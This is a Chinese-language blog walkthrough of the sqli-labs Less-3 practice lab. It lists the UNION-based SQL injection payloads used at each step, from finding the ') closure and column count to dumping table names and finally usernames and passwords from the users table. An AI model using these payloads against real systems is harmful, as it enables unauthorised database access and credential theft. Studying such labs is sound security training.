SQL注入实例(sqli-labs/less-3)

魏大橙2024-08-04 12:34

0、初始页面

1、确定闭合字符

确定为字符型注入

复制代码 
?id=1 and 1=1 
?id=1 and 1=2

确定闭合字符为 ')

复制代码 
?id=1'
?id=1')

2、确定表的列数

确定查询表的列数为3

复制代码 
?id=1') order by 3 --+

3、确定回显位置

确定回显位置为第二列和第三列

复制代码 
?id=-1') union select 1,2,3 --+

4、爆库名

当前所在数据库为security

复制代码 
?id=-1') union select 1,user(),database() --+

5、爆表名

查看users表

复制代码 
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security' --+

6、爆列名

复制代码 
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users' --+

7、显示最终结果

复制代码 
?id=-1%27) union select 1,2,group_concat(username,0x3a,password) from security.users --+
相关推荐
2301_790300962 分钟前
Python数据库操作:SQLAlchemy ORM指南
jvm·数据库·python
m0_7369191018 分钟前
用Pandas处理时间序列数据(Time Series)
jvm·数据库·python
亓才孓18 分钟前
[JDBC]PreparedStatement替代Statement
java·数据库
m0_466525291 小时前
绿盟科技风云卫AI安全能力平台成果重磅发布
大数据·数据库·人工智能·安全
爱学习的阿磊1 小时前
使用Fabric自动化你的部署流程
jvm·数据库·python
枷锁—sha1 小时前
【SRC】SQL注入快速判定与应对策略(一)
网络·数据库·sql·安全·网络安全·系统安全
惜分飞2 小时前
ORA-600 kcratr_nab_less_than_odr和ORA-600 4193故障处理--惜分飞
数据库·oracle
chian-ocean2 小时前
CANN 生态进阶:利用 `profiling-tools` 优化模型性能
数据库·mysql
m0_550024632 小时前
持续集成/持续部署(CI/CD) for Python
jvm·数据库·python
AC赳赳老秦2 小时前
代码生成超越 GPT-4:DeepSeek-V4 编程任务实战与 2026 开发者效率提升指南
数据库·数据仓库·人工智能·科技·rabbitmq·memcache·deepseek
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03使用 1panel面板 部署 php网站04OpenClaw Chrome扩展使用教程 - 浏览器中继控制05Linux下V2Ray安装配置指南06Vue-skills的中文文档07UV安装并设置国内源08让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南09Claude Code Skills 实用使用手册10一文了解国产算子编程语言 TileLang,TileLang 对国产开源生态的影响与启示